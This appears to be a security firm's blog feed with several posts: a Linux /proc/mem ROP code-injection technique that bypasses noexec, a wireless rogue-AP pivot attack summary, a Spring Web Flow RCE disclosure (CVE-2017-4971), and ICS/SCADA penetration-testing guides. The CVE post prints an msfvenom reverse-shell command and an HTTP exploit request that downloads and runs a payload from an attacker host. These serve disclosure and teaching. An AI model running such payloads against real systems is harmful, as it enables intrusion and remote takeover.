RSS Feed

Linux based inter-process code injection without ptrace(2)

Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory.

The /proc filesystem on Linux offers introspection of the running of the Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of the included dynamic libraries. This information is now relatively sensitive as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible.

The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel offers documentation for the different values this setting can be set to. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a processes /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only, or completely block access respectively. Most major operating systems were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file.

This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process:

$ grep stack /proc/self/maps
7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0                          [stack]

Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed.

This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem.

Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process which is overwritten. The sleep command uses the nanosleep syscall internally, which means that the sleep command will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. To ensure that the location of the stack pointer at the time of the syscall execution, we prefix our payload with a NOP sled, which will allow the stack pointer to be at almost any valid location, which upon return will just increase the stack pointer until it gets to and executes our payload.

A general purpose implementation for code injection can be found at Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are:

  • GNU grep (Must support -Fao --byte-offset)
  • dd (required for reading/writing to an absolute offset into a file)
  • Bash (for the math and other advanced scripting features)

The general flow of this script is as follows:

Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated.

Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries.

Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it.

The list of gadgets we require is relatively short. We require a NOP for the above discussed NOP sled, enough POP gadgets to fill all registers required for a function call, a gadget for calling a syscall, and a gadget for calling a standard function. This combination will allow us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo instructions from our payload description file into a ROP payload. For example, for a 64bit system, the line ‘syscall 60 0’ will convert to ROP gadgets to load ‘60’ into the RAX register, ‘0’ into RDI, and a syscall gadget. This should result in 40 bytes of data: 3 addresses and 2 constants, all 8 bytes. This syscall, when executed, would call exit(0).

We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload.

String arguments have also been handled, as we know the location of the stack in memory, so we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for the arguments array. We can generate the array of pointers before injection inside our payload and upon execution the pointer on the stack to the array of pointers can be used as with a normal stack allocated char**.

Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, and the offset to the stack obtained from the /proc/${PID}/maps file. To ensure that we do not encounter any permissions issues, it is necessary for the injection script to end with the ‘exec dd’ line, which replaces the bash process with the dd process, therefore transferring parental ownership over the sleep program from bash to dd.

After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed.

The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary with the filesystem noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the binary to be executed, as it does not have a parent after dd exits. To bypass this restriction, it is possible to use one of the examples present in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary will create a mirrored mount of the root filesystem to the destination directory. This new mount is not mounted noexec, and therefore it is possible to browse through this new mount to a binary, which will then be executable.

A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell.

Future work:

To speed up execution, it would be useful to cache the gadget offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not necessarily always appropriate. Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than a child executed using $(). This would allow for the sharing of environmental variables bidirectionally.

Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code.

The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf:


Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem.

The proof of concept code, and Bash ROP generator can be found at


Whitepaper: The Black Art of Wireless Post-Exploitation - Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

At DEF CON 25 we introduced a novel attack that can be used to bypass port-based access controls in WPA2-EAP networks. We call this technique an Indirect Wireless Pivot. The attack, which affects networks implemented using EAP-PEAP or EAP-TTLS, takes advantage of the fact that port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as a NAC cannot effectively protect network endpoints if the attacker has physical access to a switch, a NAC can also be bypassed if the attacker can freely control the physical layer using rogue access point attacks. The fact that this technique is possible invalidates some common assumptions about wireless security. Specifically, it demonstrates that port-based NAC mechanisms do not effectively mitigate the risk presented by weak WPA2-EAP implementations. 

While creating the Indirect Wireless Pivot, we also developed a second technique that we call the Hostile Portal Attack. This second technique can be used to perform SMB Relay attacks and harvest Active Directory credentials without direct network access. Both techniques are briefly described below, and in greater detail in the attached PowerPoint slides and whitepaper.

Hostile Portal Attacks

This is a weaponization of the captive portals typically used to restrict access to open networks in environments such as hotels and coffee shops. Instead of redirecting HTTP traffic to a login page, the hostile portal redirects traffic to a SMB share located on the attacker’s machine. The result is that after the victim is forced to associate with the attacker using a rogue access point attack, any HTTP traffic generated by the victim will cause the victim’s machine to attempt NTLM authentication with the attacker. The attacker also performs an LLMNR/NBT-NS poisoning attack against the victim.
The Hostile Portal attack gets you results that are similar to what you’d expect from LLMNR/NBT-NS poisoning, with some distinct advantages:
  • Stealthy: No direct network access is required
  • Large Area of Effect: Works across multiple subnets – you get everything that is connected to the wireless network
  • Efficient: This is an active attack that forces clients to authenticate with you. The attacker does not have to wait for a network event to occur, as with LLMNR/NBT-NS poisoning. 

Indirect Wireless Pivots

The Indirect Wireless Pivot is a technique for bypassing port-based access control mechanisms using rogue access point attacks. The attacker first uses a rogue AP attack to coerce one or more victims into connecting. A Hostile Portal Attack is then combined with an SMB Relay attack to place a timed payload on the client. The rogue access point is then terminated, allowing the client to reassociate with the target network. After a delay, the payload will execute, causing the client to send a reverse shell back to the attacker’s first interface. Alternatively, this attack can be used to place an implant on the client device.

PowerPoint Slides and Whitepaper:

For an in-depth look at both of these attacks, check out the Power Point slides and whitepaper on the subject. 

PowerPoint Slides:



CVE-2017-4971: Remote Code Execution Vulnerability in the Spring Web Flow Framework

Earlier this year, we approached Pivotal with a vulnerability disclosure relating to the Spring Web Flow framework caused by an unvalidated data binding SpEL expression that makes applications built using the framework vulnerable to remote code execution (RCE) attacks if configured with default values. This vulnerability was recently made public on Pivotal’s blog (

This post will explain in detail where this vulnerability was identified, using actual code samples, along with possible mitigations and details of the vendor fix. Pivotal has rated this as a medium severity issue, however, as is often the case in a specific context this issue could be very significant.

The Spring Web Flow is a subproject of the Spring framework and provides several components to implement MVC web applications with integrated flow definition and management. The flows and MVC views can be configured using XML configuration files. The generated servlet / portlet view objects are vulnerable to remote code execution (RCE) attacks, if configured with default values.

Proof-of-concept exploitation was performed on the following sample web application:


Analysing the framework, it was possible to identify the two conditions that are required for the generated web application to be vulnerable to RCE. These conditions are as follows:

  1. The useSpringBeanBinding parameter in the MvcViewFactoryCreator object needs to be set to false.
  2. spring‑webflow/spring‑webflow/src/main/java/org/springframework/
    129:   /**
    130:    * Sets whether to use data binding with Spring’s {@link BeanWrapper} should be enabled. Set to ‘true’ to enable.
    131:    * ‘false’, disabled, is the default. With this enabled, the same binding system used by Spring MVC 2.x is also used
    132:    * in a Web Flow environment.
    133:    * @param useSpringBeanBinding the Spring bean binding flag
    134:    */
    135:  public void setUseSpringBeanBinding(boolean useSpringBeanBinding) {
    136:          this.useSpringBeanBinding = useSpringBeanBinding;
    137:   } 

  3. A null BinderConfiguration object needs to be mapped in a view object.

These two conditions can be better analysed in the context of the web application example: spring-webflow-samples/booking-mvc.

  1. The useSpringBeanBinding parameter is set to true, which is not the default value. Therefore, commenting out the following configuration line, the default value will be set.
  2. spring‑webflow‑samples/booking‑mvc/src/main/java/org/springframework/
    46:  @Bean
    47:  public MvcViewFactoryCreator mvcViewFactoryCreator() {
    48:         MvcViewFactoryCreator factoryCreator = new MvcViewFactoryCreator();
    49:         factoryCreator.setViewResolvers(Arrays.<ViewResolver>asList(this.webMvcConfig.tilesViewResolver()));
    50:         factoryCreator.setUseSpringBeanBinding(true);
    51:       return factoryCreator;
    52:  }
  3. The BinderConfiguration object for the view “reviewBooking” is not configured, therefore it will be set to null. 
  4. spring-webflow-samples/booking-mvc/src/main/webapp/WEB-INF/
    16:  <view-state id=”enterBookingDetails” model=”booking”>
    17:         <binder>
    18:                <binding property=”checkinDate” />
    19:                <binding property=”checkoutDate” />
    20:                <binding property=”beds” />
    21:                <binding property=”smoking” />
    22:                <binding property=”creditCard” />
    23:                <binding property=”creditCardName” />
    24:                <binding property=”creditCardExpiryMonth” />
    25:                <binding property=”creditCardExpiryYear” />
    26:                <binding property=”amenities” />
    27:         </binder>
    28:         <on-render>
    29:                <render fragments=”body” />
    30:         </on-render>
    31:         <transition on=”proceed” to=”reviewBooking” />
    32:         <transition on=”cancel” to=”cancel” bind=”false” />
    33:  </view-state>
    35:  <view-state id=”reviewBooking” model=”booking”>
    36:         <on-render>
    37:                <render fragments=”body” />
    38:         </on-render>
    39:         <transition on=”confirm” to=”bookingConfirmed”>
    40:                <evaluate expression=”bookingService.persistBooking(booking)” />
    41:         </transition>
    42:         <transition on=”revise” to=”enterBookingDetails” />
    43:         <transition on=”cancel” to=”cancel” />
    44:  </view-state>

When these 2 conditions are met any MVC view object that extends the AbstractMvcView abstract class is vulnerable to RCE as detailed below.

62: /**
63:  * Base view implementation for the Spring Web MVC Servlet and Spring Web MVC Portlet frameworks.
64:  *
65:  * @author Keith Donald
66:  */
67: public abstract class AbstractMvcView implements View {

The View object starts to process a user event when an HTTP request is received.

210:   public void processUserEvent() {

211:     String eventId = getEventId();

212:     if (eventId == null) {

213:            return;

214:     }

215:     if (logger.isDebugEnabled()) {

216:            logger.debug(“Processing user event ‘” + eventId + “’”);

217:     }

218:     Object model = getModelObject();

219:     if (model != null) {

220:            if (logger.isDebugEnabled()) {

221:                   logger.debug(“Resolved model ” + model);

222:             }

223:            TransitionDefinition transition = requestContext.getMatchingTransition(eventId);

224:            if (shouldBind(model, transition)) {

225:                   mappingResults = bind(model);

226:                   if (hasErrors(mappingResults)) {

227:                          if (logger.isDebugEnabled()) {

228:                                 logger.debug(“Model binding resulted in errors; adding error messages to context”);

229:                          }

230:                          addErrorMessages(mappingResults);

231:                   }

232:                   if (shouldValidate(model, transition)) {

233:                          validate(model, transition);

234:                   }

235:            }

236:     } else {

237:            if (logger.isDebugEnabled()) {

238:                   logger.debug(“No model to bind to; done processing user event”);

239:            }

240:     }

241:     userEventProcessed = true;

242:   }

When the binding process between the input HTTP parameters and the current model starts, if a BinderConfiguration is not present the addDefaultMappings method will be called.

380:   protected MappingResults bind(Object model) {

381:       if (logger.isDebugEnabled()) {

382:            logger.debug(“Binding to model”);

383:     }

384:     DefaultMapper mapper = new DefaultMapper();

385:     ParameterMap requestParameters = requestContext.getRequestParameters();

386:     if (binderConfiguration != null) {

387:            addModelBindings(mapper, requestParameters.asMap().keySet(), model);

388:     } else {

389:          addDefaultMappings(mapper, requestParameters.asMap().keySet(), model);

390:     }

391:     return, model);

392:   }

If the input parameter starts with the fieldMarkerPrefix string, in this case “_”, the addEmptyValueMapping method will be invoked.

462:   protected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNames, Object model) {

463:       for (String parameterName : parameterNames) {

464:            if (fieldMarkerPrefix != null && parameterName.startsWith(fieldMarkerPrefix)) {

465:                   String field = parameterName.substring(fieldMarkerPrefix.length());

466:                        if (!parameterNames.contains(field)) {

467:                          addEmptyValueMapping(mapper, field, model);

468:                   }

469:            } else {

470:                   addDefaultMapping(mapper, parameterName, model);

471:            }

472:     }

473:   }

If the useSpringBeanBinding parameter is set to false, the expressionParser will be instantiated as a SpelExpressionParser object rather than BeanWrapperExpressionParser (which produces SpelExpression objects instead of BeanWrapperExpression objects). The SpelExpression object will evaluate the expression when the getValueType method is called.

483:   protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {

484:       ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());

485:     Expression target = expressionParser.parseExpression(field, parserContext);

486:     try {

487:            Class<?> propertyType = target.getValueType(model);

488:            Expression source = new StaticExpression(getEmptyValue(propertyType));

489:            DefaultMapping mapping = new DefaultMapping(source, target);

490:            if (logger.isDebugEnabled()) {

491:                    logger.debug(“Adding empty value mapping for parameter ‘” + field + “’”);

492:            }

493:            mapper.addMapping(mapping);

494:     } catch (EvaluationException e) {

495:     }

496:   }


The following proof-of-concept exploitation has been tested on the example web application spring-webflow-samples/booking-mvc. To perform the test on the application using the default configuration values the following line of code has been commented out. 

46:  @Bean
47:  public MvcViewFactoryCreator mvcViewFactoryCreator() {
48:         MvcViewFactoryCreator factoryCreator = new MvcViewFactoryCreator();
49:         factoryCreator.setViewResolvers(Arrays.<ViewResolver>asList(this.webMvcConfig.tilesViewResolver()));
50:         //factoryCreator.setUseSpringBeanBinding(true);
51:       return factoryCreator;
52:  }

A reverse bash shell payload has been created for the following proof-of-concept.

msfvenom -p cmd/unix/reverse_bash LHOST=[REDACTED].209 LPORT=4444 -f raw -o ./1


After deploying the web application example on a Ubuntu instance on the host [REDACTED].230, it was possible to access the application and start the flow of booking an hotel. When the application asks to confirm your details, it is possible to send a request similar to that shown below to execute malicious code on the server host operating system.

HTTP request:

POST /booking-mvc/hotels/booking?execution=e1s2 HTTP/1.1

Host: [REDACTED].230:8080

Content-Length: 189

Cache-Control: max-age=0

Origin: http://[REDACTED].230:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: http://[REDACTED].230:8080/booking-mvc/hotels/booking?execution=e1s2

Accept-Language: en-US,en;q=0.8

Cookie: JSESSIONID=1EA503C091D58D37FB0446EE59CFAF38

DNT: 1

Connection: close

_eventId_confirm=&_csrf=5e3e68b1-884c-47c9-8a4c-6c28f35bdffe&_new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,’wget http://[REDACTED].209:8000/1 -O /tmp/1; chmod 700 /tmp/1; /tmp/1’}).start()=

HTTP response:

HTTP/1.1 500

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Cache-Control: no-store



X-Frame-Options: DENY

Content-Type: text/html;charset=utf-8

Content-Language: en

Date: Mon, 05 Jun 2017 13:27:09 GMT

Connection: close

Content-Length: 10873

<!doctype html><html lang=”en”><head><title>HTTP Status 500 – Internal Server Error</title><style type=”text/css”>h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class=”line” /><p><b>Type</b> Exception Report</p><p><b>Message</b> Handler dispatch failed; nested exception is java.lang.IllegalAccessError</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.springframework.web.util.NestedServletException: Handler dispatch failed; nested exception is java.lang.IllegalAccessError


The application returns an IllegalAccessError Exception, however the payload has been executed, as shown in the screenshot below.


The Spring Web Flow team released a new patch on May 31st, resolving the reported vulnerability. Replacing the default expressionParser object with a BeanWrapperExpressionParser instance mitigates the vulnerability since the latter parser produces BeanWrapperExpression objects, which according to the Spring documentation will prevent the method invocation:

“Note that Spring’s BeanWrapper is not a full-blown EL implementation: it only supports property access, and does not support method invocation, arithmetic operations, or logic operations.” [1]

import org.springframework.binding.expression.Expression;

import org.springframework.binding.expression.ExpressionParser;

import org.springframework.binding.expression.ParserContext;

+import org.springframework.binding.expression.beanwrapper.BeanWrapperExpressionParser;



import org.springframework.binding.mapping.MappingResult;


@@ -78,6 +79,8 @@

private ExpressionParser expressionParser;

+ private final ExpressionParser emptyValueExpressionParser = new BeanWrapperExpressionParser();


private ConversionService conversionService;

private Validator validator;

@@ -482,7 +485,7 @@ protected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNam


protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {

ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());

- Expression target = expressionParser.parseExpression(field, parserContext);

+ Expression target = emptyValueExpressionParser.parseExpression(field, parserContext);

try {

Class<?> propertyType = target.getValueType(model);

Expression source = new StaticExpression(getEmptyValue(propertyType));




ICS/SCADA Systems for Penetration Testers: A Typical Engagement

It’s no secret that the devices that comprise process control systems are generally vulnerable to attack. This point has been made through endless research and has even been the subject of countless talks and trainings. Unfortunately, the personnel responsible for securing these networks often face significant challenges, most notably the difficulty in ensuring that devices and systems are configured securely and regularly patched without interrupting the process. In addition to this, security personnel often struggle in vain to sell the idea of security to the people in charge of the process who sometimes view security as more of an unnecessary burden, especially at lower layers of the process control network. In response to this, most of the focus has been placed on network segregation and establishing secure enclaves for sensitive process control systems. In this way, more effort can be placed on securing the barriers between the corporate network and SCADA / process control networks and enforcing tight access controls. In turn, many of the process control system assessments we’ve worked on have been almost entirely focused on determining the adequacy of network segregation efforts.

In spite of the importance of properly implemented network segregation and the interest in segregation testing, there isn’t too much information out there on performing them. The content of this blog post will detail some of the common gaps in network segmentation that we’ve seen during previous assessments. Hopefully, this information will help penetration testers who are looking to get into process control system assessments as well as give process security personnel an idea what attackers are looking for when trying to gain access to lower layers of the process control network from the corporate network.

As a general rule, network segregation assessments are performed from the perspective of an attacker that has already managed to compromise the corporate network in order to mimic real-world attack scenarios. Typically, this means either providing domain administrator access or performing the segregation assessment in conjunction with a penetration test of the corporate network.

The network segregation testing process typically follows the procedure outlined below:

  • Information Gathering
  • Entry point Identification
  • Segregated Network Access

Information Gathering

The process of information gathering centers around identifying any unprotected process control network-related information on the corporate network. This information can reveal intricate details about the process control network that can help an attacker gain access. Typically, this includes the following:

  • Process-Related Personnel – Key people such as process engineers, operators, and process IT personnel are usually privy to a great deal of sensitive information related to the process control network. Searching Active Directory for employees that fall under the aforementioned roles can help to identify their workstation hostnames as well as any network shares they may have access to. This can help narrow down the information gathering process and reduce the overall amount of effort required to gain access to the process control network since focus can be placed on those hosts and shares.
  • Network Diagrams and Design Documentation – This information can help an attacker understand the process control network at a fundamental level and provide hostnames and IP addresses that can serve as the basis for further information gathering. Moreover, network documentation may give an attacker a clear picture of the process control network, aiding them in deciding on which hosts to attack. After identifying corporate network file servers and information repositories like SharePoint, network documentation can typically found by searching for VSD, PDF, and DOC / DOCX files in directories or shares related to process IT.
  • Process Control Network Documentation – This can include details on official remote access procedures, instructions on how to login to process-related hosts, and information on the technology in use (both operational and non-operational). In many cases, extremely sensitive information such as usernames and passwords are included in this documentation, making it invaluable on a segregation assessment. This documentation can also be found in process IT shares and directories as well as occasionally inside of process-related shares and directories.
  • Network Device and System Backups – Firewall, router, and switch configuration files that are backed up on the corporate network can often serve as a road map for identifying a path to gain access to the process control network. Reviewing network device configurations can reveal which hosts on the corporate network are permitted access through remote access protocols such as RDP, VNC, or SSH. If backups of systems on the process control network can be found on the corporate network, they can be easily analyzed to extract password hashes and other sensitive data. This information can often be retrieved from IT management or network backup software as well as corporate and process IT network shares.

Entry point Identification

One of the key pieces of information that should be obtained from the information gathering phase is the existence of any entry points into the process control network from the corporate network. Process control networks are rarely completely air gapped due to the fact that they may be located in remote or unfavorable working environments. As a result, remote access is a popular solution for managing devices and systems in the process control network. The following entry points can be found in most situations:

  • Jump Box / Terminal Server – Access to the process control network from the corporate network is often permitted through a host that serves as a jump box. Usually a remote access protocol such as RDP, VNC, or SSH is used, although desktop virtualization software such as Citrix is occasionally employed instead. More security-conscious organizations tend to use remote access solutions that support multi-factor authentication.
    Official procedures for remote access to the process control network can usually be found in documentation. Jump boxes or terminal services can also be identified from analyzing network diagrams or firewall configuration files for hosts that permit connections from the corporate network over typical remote access ports. Observation of process-related personnel’s corporate network workstations can oftentimes be an effective means of identifying the jump box and remote access protocol in use.
  • VPN Access – Select users, usually process-related personnel, can be granted VPN access directly into the process control network for remote management purposes. Similarly to remote access through jump boxes, multi-factor authentication may be employed to help thwart attacks against the process control network.
    These users can sometimes be identified by an AD group created specifically for VPN users. Looking at the names and descriptions of groups where key process-related personnel are members is usually an effective means of identifying the process VPN group. Workstations of users in the process VPN group should be investigated for VPN interfaces or software as well as active connections into the process control network. These workstations can effectively be used as a bridge into the process control network.
  • Dual-Homed Hosts – In a typical process control network, several hosts on the corporate network may configured to be either dual homed or with extensive firewall rules that permit access into the process control network. Historian servers often fall under this category, due to the need to use process data for performance monitoring and improvement purposes on the corporate network. Gaining access to these hosts can often provide direct access into the process control network without having to use official remote access procedures. Even if historians are not provided extensive access into the process control network, observing their active network connections can reveal target IP address ranges.

The most reliable way to identify historians is to analyze network documentation and diagrams. Barring this, it’s not uncommon to find them by analyzing server hostnames (“HI”, “HIS”, or “HIST” are pretty widely-used naming conventions, for example). They may also be found through port scanning, although this can be a difficult task given the fact that there is little port standardization between vendors. However, many organizations with process control networks use OSISoft PI servers as historians, which can sometimes be identified by scanning for ports that are commonly associated with the software ( In general, if the process control system vendor is known or discovered through reconnaissance, publicly-available vendor documentation should be researched for commonly-used ports to scan for on the corporate network.

Another effective method of discovering dual-homed hosts is sweeping across the corporate network using some form of remote command execution, such as WMI or PSExec, and extracting active network connections, network interfaces, and routing tables. This data can then be searched for any hosts that appear to have access to the process control network. However, this method is noisy, time-consuming, and can produce an excessive amount of information to parse through, especially on larger networks. Additionally, the IP address ranges used by the target process control network would have to be known in order to make this technique more feasible.

Segregated Network Access

With a list of potential entry points into the process control network, the next step is to investigate each entry point to determine how it might be possible to leverage common security issues in order to gain access to the process control network. The following issues are typically observed when conducting process control network segmentation tests:

  • Insecure Password Practices – Passwords are a significant issue for personnel put in charge of managing the security of process control networks for multiple reasons. Most notably, it is difficult to encourage engineers and other users with access to the process control network to engage in secure password practices. Password reuse between the corporate network and process control network is extremely common since users are typically unwilling to manage multiple sets of credentials and feel that the risk of an attacker gaining access is small. After compromising the corporate network, the passwords for key process-related personnel should be cracked or obtained so they can be used for logon attempts on process control network entry points.

    Default or weak credentials are also very common. This is usually because these passwords are set by default as part of the vendor’s provided solution and never changed in order to avoid issues with deviating from the vendor’s default configuration. Oftentimes usernames and passwords will be the same (operator : operator, manager : manager, supervisor : supervisor are common examples) or some variation of the vendor’s name (Administrator : siemens as another example).

    To make matters worse, password lockout policies on operational technology is usually lax. The reasoning for this is to prevent accidental lockouts from causing issues with the process, which is generally a good idea. However, this provides attackers a lot of leeway for brute forcing credentials. This issue in combination with the prevalence of default, weak, or shared credentials makes password guessing attacks extremely viable for gaining access to the process control network.
  • Process Control Network Credentials Stored in Plaintext – Credentials for operational technology are often included in documentation. Any repositories for process control network documentation should have been enumerated as part of the information gathering phase of a segmentation assessment. Any documentation found in these repositories should be searched for passwords that can be used on entry-points.
  • Corporate Network Domain is Extended into Process Control Network – In cases where there are dual-homed hosts or workstations with VPN access on the corporate network, it is fairly common for these hosts to be joined to the corporate network’s Active Directory domain. Because of this, it is often possible to be able to access these hosts directly using highly-privileged Active Directory accounts from the corporate network such as Domain Administrators. More security-minded organizations may have taken the extra step of limiting access to these hosts to only specific users or groups. However, having compromised the corporate network, it is a relatively simple task to locate users of interest on the corporate network and extract their passwords from memory.
  • Exposed Vulnerable Services – Entry-points can often have additional services such as databases or web applications that can be vulnerable to common attacks. Any hosts with access to the process control network should be scanned thoroughly to identify exposed services. These services should then be probed to find new vulnerabilities or researched to find publicly-available vulnerabilities or common misconfigurations that could lead to compromising the host.

Easy Wins/Should Not Ever Happen

If you are ever conducting a pentest against ICS infrastructure, the following are findings that should immediately be written up as critical:

  • Modbus/DNP3 traffic on corporate network
  • HMIs accessible from the corporate network as not read-only
  • NMAPing a nuclear reactor causes a meltdown.

Hopefully, that last scenario NEVER happens, but if it does, write it up and move on.


Despite the fact that the world around us depends upon ICS technologies, interacting with and securing them still has a large gap in knowledge for both the public and the information security community.  It is our hope that these blog posts have proved insightful and can help move the conversation forward.


Introduction to Attacking ICS/SCADA Systems for Penetration Testers

Since coming into use in the late 1960s, Industrial Control Systems (ICSs) have become prevalent throughout all areas of industry and modern life. Whether in utilities, energy, manufacturing or a myriad of other applications, industrial control systems govern much of our lives.

From the invention of the Modular Digital Controller in 1968 until the mid-1990s, ICS networks were almost always isolated, operating with very limited input or output from outside sources. With the rise of cheap hardware, Microsoft Windows, Active Directory and standardization, corporate networks now receive and process data as well as fine-tune operations from networks outside of the traditional ICS network. While significant effort to ensure segmentation between IT (information technology) and OT (operational technology) networks in modern environments is occurring, the blurring of the lines between IT and OT networks has resulted in a security headache for many industries.


While the terms Industrial Control Systems and Supervisory Control And Data Acquisition (SCADA) are often used interchangeably, an important distinction between the two exists. ICS is the name given to the broader category of technology, where SCADA is a subcategory of ICS.  Examples of ICS subcategories include:

Distributed Control Systems (DCS)

  • Offers real-time monitoring and control over processes.
  • Typically several components are located within a geographically small distance such as an oil refinery, coal plant, hydroelectric dam, etc. DCS are usually contained within the four walls of a building.

Programmable Logic Controllers (PLC)

  • Typically, ruggedized computers that are the brains of smaller moving parts in a given process control system.

Supervisory Control And Data Acquisition (SCADA)

  • Acts as a manager of sorts.
  • Supervisory servers do not typically make decisions.
  • Supervisory servers typically relay commands from other systems or human operators.


  • Collect and store data regarding process statistics, sensor readings, inputs/outputs and other measures.
  • May be required for regulatory purposes.
  • Typically data is stored in a database such as MSSQL or Oracle.

Human Machine Interface (HMI)

  • HMIs are ‘pretty pictures’ allowing a process engineer to monitor an entire ICS system, at a glance.
  • Usually features graphics of various pumps, relays and data flows.

Remote Terminal Unit (RTU)

  • Small, ruggedized computers that collect and correlate data between physical sensors and ICS processes.

Adding additional complexity to ICS environments are the many different communications protocols in use. Examples of both common and proprietary protocols implemented in ICS environments include:

  • ANSI X3.28
  • BBC 7200
  • CDC Types 1 and 2
  • Conitel 2020/2000/3000
  • DCP 1
  • DNP3
  • Gedac 7020
  • ICCP Landis & Gyr 8979
  • Modbus
  • OPC
  • ControlNet
  • DeviceNet
  • DH+
  • ProfiBus
  • Tejas 3 and 5
  • TRW 9550

Typical ICS architecture

When designing ICS environments, high availability, regulatory requirements and patching challenges can significantly constrain design choices. In order to fit into the necessary restrictions, most ICS environments tend to follow the following three tiered structure:


